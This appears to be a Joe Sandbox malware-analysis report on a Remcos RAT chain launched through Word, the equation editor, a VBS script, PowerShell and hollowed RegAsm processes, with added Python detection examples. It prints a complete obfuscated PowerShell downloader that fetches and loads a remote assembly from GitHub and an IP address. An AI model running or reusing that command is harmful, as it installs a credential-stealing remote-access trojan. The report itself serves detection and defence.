Target ID: 0
Start time: 10:24:04
Start date: 30/09/2024
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x13f7f0000
File size: 1'423'704 bytes
MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID:8
Start time:10:24:23
Start date:30/09/2024
Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):true
Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:0x400000
File size:543'304 bytes
MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:10:24:27
Start date:30/09/2024
Path:C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
Imagebase:0x180000
File size:141'824 bytes
MD5 hash:979D74799EA6C8B8167869A68DF5204A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:10:24:28
Start date:30/09/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:0x870000
File size:427'008 bytes
MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:10:24:29
Start date:30/09/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
Imagebase:0x870000
File size:427'008 bytes
MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:true

Target ID:13
Start time:10:24:35
Start date:30/09/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:0x300000
File size:64'704 bytes
MD5 hash:8FE9545E9F72E460723F484C304314AD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:high
Has exited:false

Target ID:14
Start time:10:24:39
Start date:30/09/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
Imagebase:0x300000
File size:64'704 bytes
MD5 hash:8FE9545E9F72E460723F484C304314AD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:15
Start time:10:24:39
Start date:30/09/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
Imagebase:0x300000
File size:64'704 bytes
MD5 hash:8FE9545E9F72E460723F484C304314AD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:16
Start time:10:24:39
Start date:30/09/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
Imagebase:0x300000
File size:64'704 bytes
MD5 hash:8FE9545E9F72E460723F484C304314AD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:17
Start time:10:24:39
Start date:30/09/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jxitgxaufcsasqatkrvsifqmdfiulluzow"
Imagebase:0x300000
File size:64'704 bytes
MD5 hash:8FE9545E9F72E460723F484C304314AD
Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                Start time:10:24:40
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\manmhp"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                Start time:10:24:45
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                Start time:10:24:45
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                Start time:10:24:45
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                Start time:10:24:45
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                Start time:10:24:45
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                Start time:10:24:45
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                Start time:10:24:46
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

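The RegAsm.exe launches listed above (Target IDs 17 to 25) share one shape: the .NET Assembly Registration Tool started nine times within seven seconds, each time with a /stext switch writing to a randomly named file under the user's AppData\Local\Temp. RegAsm.exe has no /stext option; that is the save-as-text switch of the NirSoft recovery utilities, which Remcos runs inside an injected RegAsm.exe to dump browser and mail credentials (consistent with the "steal Chrome/Firefox passwords" and "Searches for Windows Mail specific files" signatures in this report). The Python below is an added detection example, not part of the Joe Sandbox report: it replays constructed process-creation records built from the command lines above plus one benign RegAsm invocation, flags the /stext pattern, and groups the launches into one incident. The record layout, the benign /codebase example and the 30-second burst window are assumptions.

```python
"""Flag RegAsm.exe launched with NirSoft's /stext switch (Remcos credential dump).

Added example, not part of the Joe Sandbox report. RegAsm.exe (the .NET
Assembly Registration Tool) has no /stext option; that switch belongs to
NirSoft recovery utilities, which Remcos runs inside an injected RegAsm.exe
to dump browser and mail credentials into %LOCALAPPDATA%\\Temp.
"""
import re
from datetime import datetime

REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

# Constructed records mirroring Target IDs 17-25 above (start time, dump file).
DUMPS = [
    ("10:24:39", "jxitgxaufcsasqatkrvsifqmdfiulluzow"),
    ("10:24:40", "manmhp"),
    ("10:24:45", "ohjddwfhhgpyhybdvgvfatodxp"),
    ("10:24:45", "ohjddwfhhgpyhybdvgvfatodxp"),
    ("10:24:45", "qjoweoqbvohlrmpherihlgjmywoyg"),
    ("10:24:45", "qjoweoqbvohlrmpherihlgjmywoyg"),
    ("10:24:45", "bdbgfhbcjxzqtsllvbviokedgkxhzxva"),
    ("10:24:45", "bdbgfhbcjxzqtsllvbviokedgkxhzxva"),
    ("10:24:46", "bdbgfhbcjxzqtsllvbviokedgkxhzxva"),
]
# Record layout (time/image/cmdline) is an assumption; Sysmon event 1 or any
# EDR process-creation feed carries the same three fields.
SAMPLE_EVENTS = [
    {"time": f"2024-09-30 {t}", "image": REGASM,
     "cmdline": f'{REGASM} /stext "C:\\Users\\user\\AppData\\Local\\Temp\\{name}"'}
    for t, name in DUMPS
]
# Legitimate RegAsm usage (constructed): registering a COM-visible assembly.
SAMPLE_EVENTS.append({
    "time": "2024-09-30 10:30:00", "image": REGASM,
    "cmdline": f'{REGASM} /codebase "C:\\Program Files\\Vendor\\Interop.dll"',
})

STEXT_RE = re.compile(r'(?i)(?:^|\s)/stext\s+"?([^"]+?)"?\s*$')
TEMP_DUMP_RE = re.compile(r"(?i)\\AppData\\Local\\Temp\\[a-z]{4,}$")
TIME_FMT = "%Y-%m-%d %H:%M:%S"


def is_regasm(image: str) -> bool:
    return image.lower().endswith("\\regasm.exe")


def stext_target(cmdline: str):
    """Return the /stext output path, or None when the switch is absent."""
    m = STEXT_RE.search(cmdline)
    return m.group(1) if m else None


def classify(event: dict):
    """Return a finding for a RegAsm /stext launch, else None."""
    if not is_regasm(event["image"]):
        return None
    target = stext_target(event["cmdline"])
    if target is None:
        return None  # ordinary RegAsm invocation (/codebase, /tlb, ...)
    # A random lowercase name under the user's Temp is the Remcos convention;
    # any other /stext target still warrants a look, at lower severity.
    severity = "high" if TEMP_DUMP_RE.search(target) else "medium"
    return {"time": event["time"], "target": target, "severity": severity}


def find_findings(events):
    return [f for f in map(classify, events) if f is not None]


def distinct_dump_files(findings):
    return {f["target"] for f in findings}


def burst_windows(findings, window_seconds=30):
    """Group findings whose start times fall within window_seconds of the
    first finding in the group. Remcos fires its recovery modules
    back-to-back, so one burst corresponds to one credential-dump incident."""
    bursts, current, start = [], [], None
    for f in sorted(findings, key=lambda x: x["time"]):
        t = datetime.strptime(f["time"], TIME_FMT)
        if start is not None and (t - start).total_seconds() > window_seconds:
            bursts.append(current)
            current, start = [], None
        if start is None:
            start = t
        current.append(f)
    if current:
        bursts.append(current)
    return bursts


if __name__ == "__main__":
    found = find_findings(SAMPLE_EVENTS)
    for burst in burst_windows(found):
        print(f"{burst[0]['time']}: {len(burst)} RegAsm /stext launches, "
              f"{len(distinct_dump_files(burst))} dump files")
        for f in burst:
            print(f"  [{f['severity']}] {f['target']}")
```

Run against the constructed records, the nine /stext launches collapse into a single burst with five distinct dump files, while the /codebase invocation is left alone. Matching on the switch rather than on the temp filenames matters because the names are random per run; the Temp-path check only raises severity.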
Memory Dump Source
• Source File: 0000000A.00000002.449335135.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1dd000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6d0f7b12f204b0bd023e2a0edb1472432aa5e68a5b25c4add8dcdf5d21649057
• Instruction ID: 140e7787a1da80a5b689dd40c6420767a1032c4601de6679987fc86273c9841b
• Opcode Fuzzy Hash: 6d0f7b12f204b0bd023e2a0edb1472432aa5e68a5b25c4add8dcdf5d21649057
• Instruction Fuzzy Hash: D101FD31108340ABEB209E25ECC4B67BB98EFC1764F28C11BFC480B382D3799945CAB1

Memory Dump Source
• Source File: 0000000A.00000002.449335135.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1dd000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8b034ccf078777b932ea885d415191bf765a508bee48c191da0562e372a3b73a
• Instruction ID: 52b9beb22eb2f6041dbabea26f2118849d501db6d529e4b1f7008f62575d4bdd
• Opcode Fuzzy Hash: 8b034ccf078777b932ea885d415191bf765a508bee48c191da0562e372a3b73a
• Instruction Fuzzy Hash: EB01716140D3C09FD7128B259C94B52BFB8EF53624F1981DBE8888F2A3D2699C48C772

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:3.4%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:21
                                                                                                                                                                                                  Total number of Limit Nodes:4
Execution graph (the report renders this as a node/edge list; the drawn graph is not recoverable). Entry points and the API each path reaches:
• 236b91 → 236871 → 2370a8 VirtualAllocEx (returns to 236871 → 23694b)
• 237ce0 → 237d28 / 237d30 WriteProcessMemory → 237d6b
• 237928 → 2379a3 CreateProcessW → 237a81
• 237b68 → 237baa / 237bb4 Wow64SetThreadContext → 237be2
• 236ef8 → 236f06 → 236e48 ResumeThread → 236871 → 2370a8 VirtualAllocEx → 23694b
Taken together these five functions form the CreateProcessW, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread sequence characteristic of process hollowing: a child process is created, memory is allocated and written in it from the PowerShell process, the thread context is redirected and the thread resumed. The argument lists shown below do not reveal whether the child was created suspended, so that part of the technique is inferred from the API order rather than observed.
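The API order above is the thing a detection engineer wants to match, so here is an added example (not part of the Joe Sandbox report, and not code from the sample) that scans an ordered per-process API trace for the hollowing chain and returns the matched call sites. The trace format (`ref=<addr> api=<name>`) is invented for the example; the sample trace is constructed by hand and uses the API names and the call-site addresses the report lists (CreateProcessW at 237A6C, WriteProcessMemory at 237D5C, Wow64SetThreadContext at 237BD3); the addresses given for VirtualAllocEx and ResumeThread are the execution-graph block starts, not exact call sites, and the remaining calls are filler. The matcher generalises the page's case by also accepting the Nt* and non-WOW64 spellings of each step.

```python
"""Added example: detect the process-hollowing API chain in an ordered API trace."""
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Canonical hollowing chain: create target, carve memory, write image,
# redirect the thread's entry point, resume. Each step lists the API names
# that satisfy it so the native and WOW64 variants are matched as well.
HOLLOWING_CHAIN = (
    ("create", {"CreateProcessW", "CreateProcessA", "NtCreateUserProcess"}),
    ("alloc", {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write", {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("context", {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    ("resume", {"ResumeThread", "NtResumeThread"}),
)


@dataclass(frozen=True)
class ApiCall:
    index: int   # position in the trace (0-based)
    api: str     # API name as the sandbox logs it
    ref: str     # call-site address, as in the report's "ref:" column


def parse_trace(lines: Iterable[str]) -> List[ApiCall]:
    """Parse 'ref=<addr> api=<name>' lines (a format assumed for this example)."""
    calls: List[ApiCall] = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        fields = dict(tok.split("=", 1) for tok in line.split())
        calls.append(ApiCall(index=len(calls), api=fields["api"], ref=fields["ref"]))
    return calls


def find_hollowing_chain(calls: List[ApiCall]) -> Optional[List[ApiCall]]:
    """Return the first in-order match of HOLLOWING_CHAIN, or None.

    Greedy earliest-match is sufficient for an ordered-subsequence test: each
    step must occur strictly after the call that satisfied the previous step,
    so a trace with the right APIs in the wrong order does not match.
    """
    matched: List[ApiCall] = []
    start = 0
    for _step, names in HOLLOWING_CHAIN:
        hit = next((c for c in calls[start:] if c.api in names), None)
        if hit is None:
            return None
        matched.append(hit)
        start = hit.index + 1
    return matched


def chain_summary(chain: List[ApiCall]) -> str:
    """One-line alert text: 'CreateProcessW@00237A6C -> VirtualAllocEx@... -> ...'."""
    return " -> ".join(f"{c.api}@{c.ref}" for c in chain)


# Constructed trace mirroring the report's PowerShell process. Call-site
# addresses for CreateProcessW, WriteProcessMemory and Wow64SetThreadContext
# are the ones the report gives; the others are block starts or filler.
SAMPLE_TRACE = """\
ref=00231824 api=GetModuleHandleW
ref=00237A6C api=CreateProcessW
ref=002370A8 api=VirtualAllocEx
ref=00237D5C api=WriteProcessMemory
ref=00237D5C api=WriteProcessMemory
ref=00237BD3 api=Wow64SetThreadContext
ref=00236E48 api=ResumeThread
"""

# Constructed benign trace: a normal child launch, no remote writes.
BENIGN_TRACE = """\
ref=00401000 api=CreateProcessW
ref=00401020 api=ResumeThread
"""

# Constructed out-of-order trace: same APIs, but the write precedes the create.
OUT_OF_ORDER_TRACE = """\
ref=00401000 api=WriteProcessMemory
ref=00401010 api=CreateProcessW
ref=00401020 api=VirtualAllocEx
ref=00401030 api=Wow64SetThreadContext
ref=00401040 api=ResumeThread
"""


if __name__ == "__main__":
    for name, trace in (("sample", SAMPLE_TRACE), ("benign", BENIGN_TRACE),
                        ("out_of_order", OUT_OF_ORDER_TRACE)):
        chain = find_hollowing_chain(parse_trace(trace.splitlines()))
        print(name, "->", chain_summary(chain) if chain else "no hollowing chain")
```

The matcher keys on order rather than on a handle value because sandbox traces, like the argument lists in this report, often show `?` for handles; if the trace does carry the target process handle, tightening each step to the same handle is the obvious next refinement.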
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442853576.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_320000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: L4#p$L4#p$L4#p
                                                                                                                                                                                                  • API String ID: 0-1310181111
                                                                                                                                                                                                  • Opcode ID: 4dd46b8ac1fee77707db773724fab8a9ebefc2088922624e4cc0edd7fdf7d574
                                                                                                                                                                                                  • Instruction ID: a3fd62ce10d748ca1993cd988dc30ef29c96366aae02cce6b22537e404710fde
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dd46b8ac1fee77707db773724fab8a9ebefc2088922624e4cc0edd7fdf7d574
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33D25A34600214EFDB15DF54D994ABAB7B6EB89314F24C49AEC1997392CB32EE42CF50

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
Control-flow graph (node/edge list; the drawn graph is not recoverable): function 237928-237b31, 14 basic blocks; the block 2379dc-237a7f calls CreateProcessW, with the result checked at 237a81-237a87, and the function ends in a self-looping block at 237b31.
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00237A6C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_230000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                                                  • Opcode ID: 74c9d7010aa415ed18721f26f7cbfc628f318b33e01f554f4e3f84ebbae65ea2
                                                                                                                                                                                                  • Instruction ID: bd5cc8876db7cc806cf49dcfca5108f9a452cb6727d41b4bb13a02887f6e5cd6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74c9d7010aa415ed18721f26f7cbfc628f318b33e01f554f4e3f84ebbae65ea2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D5107B1901229DFEF24CF99C880BDDBBB5BF48304F1085AAE909B7250D7719A99CF50

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
Control-flow graph (node/edge list; the drawn graph is not recoverable): function 237cde-237d93, 5 basic blocks; the block 237d30-237d69 calls WriteProcessMemory, with the failure path at 237d6b-237d71 rejoining at 237d72.
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00237D5C
                                                                                                                                                                                                  Memory Dump Source
